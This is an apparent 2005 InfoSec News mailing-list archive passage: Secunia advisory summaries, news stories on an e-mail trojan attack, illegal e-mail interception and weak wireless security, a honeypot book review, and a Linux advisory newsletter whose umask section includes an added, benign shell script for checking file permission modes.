Full Advisory: http://secunia.com/advisories/16793/ -- [SA16788] Zebedee Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-12 A vulnerability has been reported in Zebedee, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16788/ -- [SA16786] Snort TCP SACK Option Handling Denial of Service Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-13 Alejandro Hernandez Hernandez has reported a vulnerability in Snort, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16786/ -- [SA16775] PunBB Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data Released: 2005-09-12 Some vulnerabilities have been reported in PunBB, which can be exploited by malicious people to conduct SQL injection and script insertion attacks. Full Advisory: http://secunia.com/advisories/16775/ -- [SA16773] Qt Library zlib Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Some vulnerabilities have been reported in Qt, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/16773/ -- [SA16762] class-1 Forum Software File Extension SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Manipulation of data Released: 2005-09-09 rgod has discovered a vulnerability in class-1 Forum Software, which can be exploited by malicious people to conduct SQL injection attacks. 
Full Advisory: http://secunia.com/advisories/16762/ -- [SA16757] Sun Java System Web Proxy Server Denial of Service Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-09 Three vulnerabilities have been reported in Sun Java System Web Proxy Server, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16757/ -- [SA16756] mimicboard2 Script Insertion and Exposure of User Credentials Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information Released: 2005-09-09 Donnie Werner has reported a vulnerability and a security issue in mimicboard2, which can be exploited by malicious people to conduct script insertion attacks and disclose sensitive information. Full Advisory: http://secunia.com/advisories/16756/ -- [SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-15 Two vulnerabilities have been reported in Lotus Domino, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16830/ -- [SA16744] Sawmill Error Message Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-09 NTA Monitor has reported a vulnerability in Sawmill, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16744/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) 
http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Fri Sep 16 05:03:40 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:09:47 2005 Subject: [ISN] NSC computers targeted in hacker e-mail attack Message-ID: http://www.taipeitimes.com/News/taiwan/archives/2005/09/15/2003271706 STAFF WRITER Sep 15, 2005 The National Security Council's (NSC) computer system was the target of an attempted e-mail attack Monday, according to a report in the Liberty Times, the Taipei Times' sister newspaper. According to sources, the attempted break-in was discovered yesterday afternoon, and a meeting was immediately called to discuss ways of beefing up network security. According to the Liberty Times' source, the NSC's computers began acting up yesterday afternoon. An investigation revealed that e-mails containing a "trojan" program had been sent to NSC Deputy Secretary General Ko Cheng-heng's (?_????) current and former secretaries. Had the e-mail been opened by either assistant, the program could have installed a "backdoor" into the computer, giving the sender full access to the computer system. Ko is responsible for national security and cooperation with the US. As the e-mails contained the subject line "freedom" and "arms procurement," it is suspected that the hacker had a clear idea of his targets. Sources within the NSC said that such subject lines were intended to dupe the recipients into opening the e-mails and activating the trojan program. Had the program been activated, the sender would have been able to see the contents of all the files on the NSC's computer system, including CDs and disks used on the system. Given the sensitivity of much of the materials, this e-mail attack, though unsuccessful, is being viewed with the utmost seriousness. 
The e-mail was discovered on the computer of Ko's former secretary, who had been transferred to another post in July. The current secretary had not yet checked e-mail, and as a result, the NSC's system was unaffected.

Similar e-mails were also sent to senior officials in other government departments, although the full extent of the attack is not yet known. Officials said that an investigation was underway.

Copyright © 1999-2005 The Taipei Times

From isn at c4i.org Fri Sep 16 05:03:56 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 16 05:10:02 2005
Subject: [ISN] Tycoon fined for e-mail spying
Message-ID:

http://www.timesonline.co.uk/article/0,,2-1782674,00.html

By Lewis Smith
September 16, 2005

AN INTERNET pioneer who uncovered the e-mails that forced Dame Shirley Porter to pay £12.3 million to end the homes-for-votes scandal was fined yesterday for hacking into the messages.

Clifford Stanford, the founder of Demon Internet, was plotting a boardroom takeover of an electronic data firm and intercepted e-mails to and from Dame Shirley's son, John.

The contents revealed that Dame Shirley had access to many millions of pounds despite her claim to have assets of only £300,000 when faced with a £42 million surcharge for vote-rigging. Details of the e-mails were passed to the media and Westminster City Council. Soon after £25 million of assets were frozen, Dame Shirley offered to pay £12.3 million to settle the case.

Dame Shirley, as Tory leader of Westminster council during the 1980s, had overseen the selling of council homes in marginal wards to people thought likely to vote Conservative, while the homeless were placed in asbestos-ridden tower blocks in safe Labour wards. Allegations of gerrymandering ended with an auditor ordering her and fellow councillors to pay a £31.6 million surcharge. That was upheld by the House of Lords, but Dame Shirley maintained that she was too poor to pay.

With interest and legal fees increasing the surcharge to £42 million, the dispute continued until her son's e-mails revealed that she was offering to bankroll him.

Stanford, however, had not set out to find the truth about Dame Shirley's finances, but was spying on her son to oust him from the board of Redbus, the data company. When he saw Mr Porter's e-mails, he wrote to his accomplice: "Where do we go from here? Do we try to blackmail him into resigning from the board or do we go to the institutional shareholders or the press with it?"

The two men had set up Redbus together, with Stanford investing much of the £29 million he made from the sale of Demon. In June 2002, after falling out with Mr Porter, Stanford resigned from Redbus but kept his 30 per cent shareholding and began plotting a return to the board.

Software was installed that ensured Mr Porter's e-mails were copied to an account set up by Stanford's accomplice, George Liddell, a private investigator. The electronic spying amounted to "unlawful and unauthorised interception of electronic communications" under the Regulation of Investigatory Powers Act (RIPA) 2000.

Sarah Whitehouse, for the prosecution, said: "A vast amount of information was copied to that e-mail account, including information about John Porter and his family and his bank account details." Among the messages were "privileged legal documents", personal e-mails and business memos.

Mr Porter and fellow board members realised what was happening only when details of a meeting were posted on a website within 15 minutes.

Stanford and Liddell were cleared of conspiring to blackmail Dame Shirley and her son, but both admitted unauthorised interception of e-mails.

Judge Geoffrey Rivlin, QC, who sentenced the men at Southwark Crown Court in London yesterday, said that the offence was an unjustified breach of confidentiality. He gave them both a six-month suspended prison sentence and ordered Stanford to pay a £20,000 fine.

The judge said: "It is essential people, in whatever walks of life, and, of course, those running important businesses, should know that the integrity of their confidential communication should be respected."

David Martin-Sperry, counsel for Liddell, said his client's decision to take material to Westminster council's lawyers had benefited many people. Helen McDowell, Stanford's solicitor, said that he would appeal.

-=-

WHAT'S BANNED AND WHAT'S NOT

Potentially lawful: looking over someone's shoulder to read e-mails
Definitely unlawful: hacking into a computer to read their e-mails

Potentially lawful: placing a bugging device near a telephone
Definitely unlawful: using a bugging device in a telephone handset

Potentially lawful: using a directional amplifier to listen to a mobile phone conversation
Definitely unlawful: listening to the conversation by intercepting the signal

Source: Justice

From isn at c4i.org Fri Sep 16 05:04:54 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 16 05:10:14 2005
Subject: [ISN] REVIEW: "Honeypots for Windows", Roger A. Grimes
Message-ID:

Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah"

BKHNPTWN.RVW 20050614

"Honeypots for Windows", Roger A. Grimes, 2005, 1-59059-335-9, U$39.99
%A Roger A. Grimes roger@banneretcs.com
%C 2560 Ninth Street, Suite 219, Berkeley, CA 94710
%D 2005
%G 1-59059-335-9
%I Apress
%O U$39.99 510-549-5930 fax 510-549-5939 info@apress.com
%O http://www.amazon.com/exec/obidos/ASIN/1590593359/robsladesinterne
   http://www.amazon.co.uk/exec/obidos/ASIN/1590593359/robsladesinte-21
%O http://www.amazon.ca/exec/obidos/ASIN/1590593359/robsladesin03-20
%O Audience i+ Tech 2 Writing 1 (see revfaq.htm for explanation)
%P 392 p.
%T "Honeypots for Windows"

Now, we all know that honeypots can be fun: turning the tables on the blackhats, and watching what they are doing for once.
We'll even acknowledge that the information honeypots provide can be useful, teaching us the types of approaches and activities that intruders are likely to undertake. But Grimes, in the introduction, stresses the position that honeypots are important security tools used for protection: that the extensive employment of honeypots will somehow "put an end" to script kiddies and the myriad attacks we see flying around the nets.

Part one is about general honeypot concepts. Chapter one is an introduction to honeypots, looking at different honeypots and some common attack types, and has an extremely terse mention of the fact that there are risks associated with using honeypots. Components and simple topologies for honeypots are listed in chapter two.

Part two moves specifically to Windows honeypots. Chapter two lists the ports that a Windows computer typically has open, and provides some (but not much) information on how the major ones work. A set of questions to ask yourself about how you want to operate and configure your honeypot are in chapter three, along with generic advice about hardening the computer if you use Windows as the native operating system. There is a table of services that you might want to turn off. There is also an inventory of programs you may wish to remove: it contains rather dated entries such as edlin.exe, but doesn't mention items such as tftp.exe. Chapters five to seven are concerned with the honeyd program and its Windows port, first in regard to description and installation, then configuration options, and finally service scripts. Other honeypot programs; Back Officer Friendly (BOF), LaBrea, SPECTER, KFSensor, Patriot Box, and Jackpot; are outlined in chapter eight, with the commercial entries getting the bulk of the space.

Part three deals with the operation of honeypots. Chapter nine has some basic traffic analysis information, mostly documentation for the use of the Ethereal packet sniffer and the Snort intrusion detection system. A number of tools for monitoring your system are listed in chapter ten. Even though the title is "Honeypot Data Analysis," most of chapter eleven records more monitoring tools. Grimes reprises some of his stuff from "Malicious Mobile Code" (cf. BKMLMBCD.RVW), and adds a catalogue of assembly tools, to talk about analysing such code in chapter twelve.

As a compilation of utilities, the book will probably be a handy reference for those who are interested in trying out a honeypot, or possibly just getting more information from their Windows computer. Network administrators who are seriously interested in actually running a honeypot or reviewing the data thus collected should probably look into "Know Your Enemy" (cf. BKKNYREN.RVW) or "Honeypots" (cf. BKHNYPOT.RVW), both by Spitzner.

copyright Robert M. Slade, 2005 BKHNPTWN.RVW 20050614

======================
(quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu
A hundred years from now it won't matter the kind of house I lived in, what my bank account total was, or the kind of car I drove. But the world may be different because I was important in the life of a child. - Joyce Eyman
http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade

From isn at c4i.org Mon Sep 19 02:08:58 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 19 02:13:39 2005
Subject: [ISN] Technology Experts: Local wireless networks at risk
Message-ID:

http://www.freenewmexican.com/news/32642.html

By Wendy Brown
The New Mexican
September 18, 2005

The Bull Ring restaurant in downtown Santa Fe has an outside patio that is perfect for having lunch -- and it might be an equally fine place for some leisurely hacking into wireless computer networks.

Eric Padilla and Chris Ernst of AirNet Security of Santa Fe used a laptop computer Thursday to demonstrate how easy it would be to break into many wireless computer networks in downtown Santa Fe.
Standing outside The Bull Ring, Padilla and Ernst did a quick search for networks and found six in the area. At least half of them were businesses, and without naming any names, some were definitely the type of enterprises that would have sensitive information about their clients.

None of the networks was totally open, but all but one of them used WEP, or Wired Equivalency Privacy, as a security measure. Ernst and Padilla said using WEP is like having a paper door on your home -- someone could blast through it with little time and effort.

Ernst and Padilla used a regular Microsoft program for a wireless laptop computer to determine the security on the networks. They didn't do any hacking.

Ernst said free WEP-cracking programs are available on the Internet that also include step-by-step instructions on how to use them. Most people could get through WEP security in 10 to 20 minutes, he said.

One network used TKIP, which stands for Temporal Key Integrity Protocol. TKIP is the next generation of WEP security, Padilla said, but tools are also available to break into that security measure as well.

The only security measure that isn't breakable yet is Advanced Encryption Standard, or AES, Padilla said, but even systems using AES are vulnerable at the point where people log on to the system.

"Nowadays, really no network is safe," Ernst said.

Padilla and Ernst said one reason hacking has become so easy is because many hacking tools are free and available on the Internet. The Remote Exploit Web site is one that makes many of them available, Ernst said.

For example, anyone can download the Auditor Security Collection from that site and put it on a compact disc, he said. The collection is a kind of "greatest hits" of wired- and wireless-hacking programs, Ernst said, and it also contains easy-to-use directions for the programs.

Hackers usually use wireless-hacking programs to gain access to a network and then attack the wired portion, he said.

The top of the Remote Exploit Web site says: "We are just a group of people that like to experiment with computers. We hope that we can provide some information back to the public and support the ongoing process of learning."

Max Moser, who founded the Remote Exploit Web site in 2001, said in an e-mail that he doesn't support hackers at all, but thinks of the site as a place to keep security-minded people up to date on what hackers are capable of doing. He said he lives in Switzerland.

Moser said he believes the security on wireless networks is always as good as its encryption, but many computer configurations are weak and contain security holes. Attacks "can overcome most protections with ease," he said.

Padilla said the Remote Exploit site is good for security people like himself, but the downside is that it can help hackers find new ways to break into networks.

And most hackers don't need any encouragement, Padilla and Ernst said.

"Hackers have nothing better to do," Ernst said. "Instead of hanging out at the bar, they're hanging out at their buddy's house creating a new hacking tool at 3 o'clock in the morning."

The hacking community constantly has the security community on the defense, Ernst said.

Not everyone, however, agrees that wireless networks are that easy to penetrate.

Al Catanach, owner of Computer Network Service Professionals, a company that provides wireless-Internet service in Santa Fe, said his system is secure because it uses AES and Data Encryption Standard and a radio system that is hardwired to a customer's computer.

The radio authenticates to the CNSP network without requiring the user to provide a user name and password, so the wireless portion is seamless, Catanach said.

Catanach said he was a computer-security manager for the Army National Guard for three years and is familiar with ways to keep networks secure. That said, even he admits that if a hacker really wants to get in, it's possible to find a way.

"You're never going to have a fool-proof system," Catanach said.

Thankfully, most hackers are kids who are more interested in seeing if they can crack a network than stealing anything or doing any damage, he said.

Josh Dennis, who is in charge of security at Grappa Wireless of Santa Fe, said his network uses three layers of security -- DES, a user name and password that the radio authenticates automatically (without the customer having to type anything into the computer) and a color-code number.

Dennis said the government has phased out DES for secret documents because extremely powerful computers can penetrate it, but the average hacker with a laptop would never be able to get through.

And Gabriel Garcia, a member of Best Buy's "Geek Squad" of computer-security technicians, said he believes 64-bit WEP is secure.

"It's extremely difficult to get into if it's set up correctly," he said.

Another sign that wireless-security awareness is up is that the WorldWide WarDrive has come to an end, according to the organization's Web site.

The drive started in 2002 and encouraged people all over the world to test the security measures of wireless systems, frequently showing that people weren't even using basic security measures like WEP.

"By ending the project we aren't implying that WLANs (wireless local-area networks) are now secure," a person who signed in as "Roamer" said on the WarDrive site. "In fact they are far from it, but organized efforts to raise further awareness are no longer necessary. The message is getting out in a number of ways, and we have done our part."

Even though security awareness is up, it also appears so is wireless hacking -- even if it's now more difficult.

According to the Computer Security Institute/FBI 2005 Computer Security Survey, 55 percent of businesses surveyed reported that someone had used the company's computer network without authorization in the last year.

Of those, about 18 percent reported abuse of a wireless network, up from zero percent in 2003 and every preceding year. Abuse of a wireless network cost 639 surveyed businesses more than $500,000, and the cost for all unauthorized access was more than $31 million, according to the survey.

Ernst and Padilla said they recommend that people, and particularly businesses, get the strongest security measures available and then install a monitoring system so they know if someone hacks into the system and can figure out how to stop it from happening again.

Systems for households start at $99 for a year's worth of monitoring, and business systems cost about $500 to start and $350 a month to run, Ernst said.

"It's a small price to pay," he said.

From isn at c4i.org Mon Sep 19 02:09:11 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 19 02:13:55 2005
Subject: [ISN] New IE Bug Opens XP SP2 To Attack
Message-ID:

http://www.informationweek.com/story/showArticle.jhtml?articleID=170704182

By Gregg Keizer
TechWeb News
Sept. 16, 2005

Microsoft's Internet Explorer browser sports a flaw that hackers could use to launch a remote attack on Windows XP SP2, eEye Digital Security said Thursday.

"The flaw is remotely exploitable," said Mike Puterbaugh, eEye's director of product management.

Although eEye has notified Microsoft of the bug -- and Microsoft has confirmed receipt of the report -- no patch is available. According to eEye, that's not unusual: on average, Microsoft has taken 132 days to patch holes that the Aliso Viejo, Calif.-based security vendor has reported since February 2004.

eEye takes the unique step of logging its reports to Microsoft, then showing the number of days since the vulnerability was confirmed by the Redmond company. After 60 days, it considers a patch "overdue."

Internet Explorer, says eEye, has at least five other critical, but unpatched, vulnerabilities, including ones reported 15, 46, 129, 134, and 171 days ago.
Microsoft has been patching IE regularly, but is having trouble keeping up with the browser's vulnerabilities. In August, it fixed three bugs in the browser, and since the first of the year, has patched IE five out of nine months.

From isn at c4i.org Mon Sep 19 02:08:01 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 19 02:14:12 2005
Subject: [ISN] Cryptology officers renamed
Message-ID:

http://www.navytimes.com/story.php?f=1-292925-1106128.php

By Andrew Scutro
Times staff writer
September 15, 2005

Navy cryptology officers will now be known as "information warfare" officers, according to a Navy administration message released Thursday.

According to the message, the name change is meant to account for increased skills and responsibilities of signals intelligence, from monitoring radio traffic and breaking codes to more modern uses and methods.

According to Naval Personnel Command in Millington, Tenn., information warfare officers are still a restricted line community, not an unrestricted line like aviators and submariners.

Officers in the category are not required to take any administrative action, according to the message.

From isn at c4i.org Mon Sep 19 02:08:36 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 19 02:14:34 2005
Subject: [ISN] Linux Advisory Watch - September 16th 2005
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                            Weekly Newsletter     |
|  September 16th, 2005                       Volume 6, Number 38a    |
+---------------------------------------------------------------------+

  Editors:      Dave Wreski                    Benjamin D. Thomas
                dave@linuxsecurity.com         ben@linuxsecurity.com

Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability.
This week, advisories were released for apache, kdelibs, cvs, mod_ssl, tdiary, squid, mozilla, common-lisp, turqstat, slib, umb-scheme, psmisc, gtk, file, subversion, unzip, e2fsprogs, selinux-policy-targeted, firefox, mozilla, vte, xdelta, tvtime, dhcp, gnupg, util-linux, mc, libwnck, pcre, exim, and squid. The distributors include Debian, Fedora, Gentoo, and Red Hat.

---

## Master of Science in Information Security ##

Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life.

LEARN MORE: http://www.msia.norwich.edu/linux_en

---

Using umask

The umask can be used to control the default file permission on newly-created files. The umask command controls the default file and directory creation mode for newly-created files and directories. It is recommended that you make root's umask 077, which will disable read, write, and execute permission for other users, unless explicitly changed using chmod.

The umask command can be used to determine the default file creation mode on your system. It is the octal complement of the desired file mode. If files are created without any regard to their permissions settings, a user could inadvertently give read or write permission to someone that should not have this permission.

The umask for the creation of new executable files is calculated as follows:

    777  Default Permissions
   -022  Subtract umask value, for example
   -----
    755  Allowed Permissions

So in this example we chose 022 as our umask. This shows us that new executables that are created are given mode 755, which means that the owner can read, write, and execute the binary, while members of the group to which the binary belongs, and all others, can only read and execute it.

The umask for the creation of new text files is calculated as follows:

    666  Default Permissions
   -022  Subtract umask value, for example
   -----
    644  Allowed Permissions

This example shows us that given the default permissions of 666, and subtracting our sample umask value of 022, new text files are created with mode 644, which states that the owner can read and write the file, while members of the group to which the file belongs, and everyone else can only read the new file.

Typically umask settings include 022, 027, and 077, which is the most restrictive. Normally the umask is set in /etc/profile, so it applies to all users on the system. The file creation mask must be set while keeping in mind the purpose of the account. Permissions that are too restrictive may cause users to start sharing accounts or passwords, or otherwise compromise security. For example, you may have a line that looks like this:

    # Set the user's default umask
    umask 033

Be sure to make root's umask at least 022, which will disable write and execute permission for other users, unless explicitly changed using chmod(1).

READ ENTIRE ARTICLE:
http://www.linuxsecurity.com/content/view/117255/141/

----------------------

Linux File & Directory Permissions Mistakes

One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com.
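The umask arithmetic from the "Using umask" item above, as an added shell example that is not part of the newsletter: it computes the mode a new file or directory receives under a given umask, verifies the prediction against what the kernel actually assigns when a file is created, and flags where the article's "subtract the umask" shorthand diverges from the real operation. The default modes 777 (executables, directories) and 666 (plain files) are the ones the article uses; the function names are my own.

```sh
#!/bin/sh
# Added example (not from the LinuxSecurity newsletter): umask arithmetic
# checked against real file creation.

# effective_mode DEFAULT UMASK: the mode the kernel assigns, i.e. DEFAULT
# with every bit that is set in UMASK cleared (DEFAULT & ~UMASK).  Both
# arguments are octal strings such as 666 or 022.
effective_mode() {
    printf '%03o\n' $(( 0$1 & ~0$2 & 0777 ))
}

# subtraction_mode DEFAULT UMASK: the article's "subtract the umask"
# shorthand, kept only to show where it disagrees with effective_mode.
subtraction_mode() {
    printf '%03o\n' $(( 0$1 - 0$2 ))
}

# observed_mode PATH: permission bits of an existing path as three octal
# digits; GNU stat first, BSD/macOS stat as the fallback.
observed_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%OLp' "$1"
}

# created_mode file|dir UMASK: create a file or directory under UMASK in a
# scratch directory and report the mode the kernel actually assigned.
created_mode() {
    kind=$1
    mask=$2
    scratch=$(mktemp -d) || return 1
    (
        umask "$mask"
        if [ "$kind" = dir ]; then
            mkdir "$scratch/probe"          # mkdir(2) starts from 777
        else
            : > "$scratch/probe"            # open(2) starts from 666
        fi
    )
    observed_mode "$scratch/probe"
    rm -rf "$scratch"
}

# umask_report UMASK: one line per kind with predicted and observed modes,
# plus a note whenever the subtraction shorthand would have misled you.
umask_report() {
    mask=$1
    for kind in file dir; do
        if [ "$kind" = dir ]; then default=777; else default=666; fi
        predicted=$(effective_mode "$default" "$mask")
        actual=$(created_mode "$kind" "$mask")
        printf 'umask %s  %-4s predicted %s  observed %s' \
            "$mask" "$kind" "$predicted" "$actual"
        if [ "$(subtraction_mode "$default" "$mask")" != "$predicted" ]; then
            printf '  (subtraction would give %s)' \
                "$(subtraction_mode "$default" "$mask")"
        fi
        echo
    done
}

# Walk the umasks the article mentions.  033 is the instructive one: for a
# 666 file, 666 - 033 = 633, but the kernel clears bits and produces 644.
for m in 022 027 033 077; do
    umask_report "$m"
done
```

Subtraction only matches the kernel when no umask bit falls on a bit the default mode already lacks; the 033 case above is the counter-example, which is why umask is described as a complement rather than a subtrahend.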
http://www.linuxsecurity.com/content/view/119415/49/

---

Buffer Overflow Basics

A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

http://www.linuxsecurity.com/content/view/119087/49/

---

Review: The Book of Postfix: State-of-the-Art Message Transport

I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Patrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow, and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection.

http://www.linuxsecurity.com/content/view/119027/49/

--------

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------------------+
| Distribution: Debian            | ----------------------------//
+---------------------------------+

* Debian: New Apache packages fix HTTP request smuggling
8th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120330

* Debian: New kdelibs packages fix backup file information leak
8th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120332

* Debian: New Apache2 packages fix several vulnerabilities
8th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120338

* Debian: New cvs packages fix insecure temporary files
9th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120343

* Debian: New mod_ssl packages fix acl restriction bypass
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120360

* Debian: New tdiary packages fix Cross Site Request Forgery
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120370

* Debian: New squid packages fix several vulnerabilities
13th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120374

* Debian: New Mozilla packages fix several vulnerabilities
13th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120377

* Debian: New common-lisp-controller packages fix arbitrary code injection
14th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120380

* Debian: New turqstat packages fix buffer overflow
15th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120389

* Debian: New centericq packages fix several vulnerabilities
15th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120392

+---------------------------------+
| Distribution: Fedora            | ----------------------------//
+---------------------------------+

* Fedora Core 4 Update: slib-3a1-3.fc4
8th, September, 2005
*.scm and *.init scripts shipped with slib expect that slib is located directly in /usr/local/lib, which is not true. This update fixes this problem.
http://www.linuxsecurity.com/content/view/120334

* Fedora Core 4 Update: umb-scheme-3.2-39.fc4
8th, September, 2005
The UMB-scheme package conflicts with the SLIB package by installation of /usr/share/info/slib.info.gz. This update fixes the issue.
http://www.linuxsecurity.com/content/view/120335

* Fedora Core 4 Update: psmisc-21.5-5
8th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120336

* Fedora Core 4 Update: glib2-2.6.6-1
8th, September, 2005
GLib 2.6.6 fixes several bugs in the GOption cmdline option parser, in the GKeyFile keyfile parser, a possible deadlock with threadpools and several other bugs.
http://www.linuxsecurity.com/content/view/120340

* Fedora Core 4 Update: gtk2-2.6.10-1
8th, September, 2005
GTK+ 2.6.10 fixes numerous bugs in the file chooser, the icon view, and some other widgets. See the release announcements at http://www.gtk.org for more details.
http://www.linuxsecurity.com/content/view/120341

* Fedora Core 4 Update: file-4.15-fc4.1
9th, September, 2005
Several bug fixes and new magics.
http://www.linuxsecurity.com/content/view/120344

* Fedora Core 4 Update: subversion-1.2.3-2.1
9th, September, 2005
This update includes the latest stable release of Subversion, including a number of bug fixes.
http://www.linuxsecurity.com/content/view/120346

* Fedora Core 3 Update: unzip-5.51-4.fc3
9th, September, 2005
This update fixes a TOCTOU issue in unzip.
http://www.linuxsecurity.com/content/view/120347

* Fedora Core 4 Update: util-linux-2.12p-9.10
9th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120348

* Fedora Core 4 Update: e2fsprogs-1.38-0.FC4.1
9th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120349

* Fedora Core 4 Update: selinux-policy-targeted-1.25.4-10.1
9th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120350

* Fedora Core 3 Update: e2fsprogs-1.38-0.FC3.1
9th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120351

* Fedora Core 4 Update: firefox-1.0.6-1.2.fc4
10th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120354

* Fedora Core 3 Update: firefox-1.0.6-1.2.fc3
10th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120355

* Fedora Core 4 Update: mozilla-1.7.10-1.5.2
10th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120356

* Fedora Core 3 Update: mozilla-1.7.10-1.3.2
10th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120357

* Fedora Core 3 Update: vte-0.11.14-3.fc3
12th, September, 2005
Please report regressions to GNOME Bugzilla.
http://www.linuxsecurity.com/content/view/120361

* Fedora Core 4 Update: vte-0.11.14-3.fc4
12th, September, 2005
Please report regressions to GNOME Bugzilla.
http://www.linuxsecurity.com/content/view/120362

* Fedora Core 4 Update: slib-3a1-4.fc4
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120364

* Fedora Core 4 Update: xdelta-1.1.3-17.fc4
12th, September, 2005
xdelta shipped with FC4 isn't compiled with large file support and uses the obsolete glib-1.2 library. The libedsio symbols are missing from the installed libxdelta library. This release introduces xdelta ported to glib-2 and fixes the noted issues.
http://www.linuxsecurity.com/content/view/120365

* Fedora Core 3 Update: xdelta-1.1.3-16.fc3
12th, September, 2005
xdelta shipped with FC3 isn't compiled with large file support and uses the obsolete glib-1.2 library. The libedsio symbols are missing from the installed libxdelta library. This release introduces xdelta ported to glib-2 and fixes the noted issues.
http://www.linuxsecurity.com/content/view/120366

* Fedora Core 4 Update: tvtime-1.0.1-0.fc4.1
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120367

* Fedora Core 4 Update: evolution-data-server-1.2.3-3.fc4
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120368

* Fedora Core 4 Update: openssh-4.2p1-fc4.1
12th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120369

* Fedora Core 4 Update: dhcp-3.0.2-22.FC4
13th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120373

* Fedora Core 3 Update: gnupg-1.2.7-1
14th, September, 2005
This update upgrades GnuPG from version 1.2.6 to version 1.2.7, fixing bug #139209 (~/.gnupg not created when gpg is first run), among others.
http://www.linuxsecurity.com/content/view/120383

* Fedora Core 4 Update: util-linux-2.12p-9.11
14th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120384

* Fedora Core 3 Update: mc-4.6.1-2.FC3
14th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120385

* Fedora Core 3 Update: util-linux-2.12a-24.5
14th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120386

* Fedora Core 4 Update: mc-4.6.1a-0.12.FC4
14th, September, 2005
Updated package.
http://www.linuxsecurity.com/content/view/120387

* Fedora Core 4 Update: libwnck-2.10.3-1
14th, September, 2005
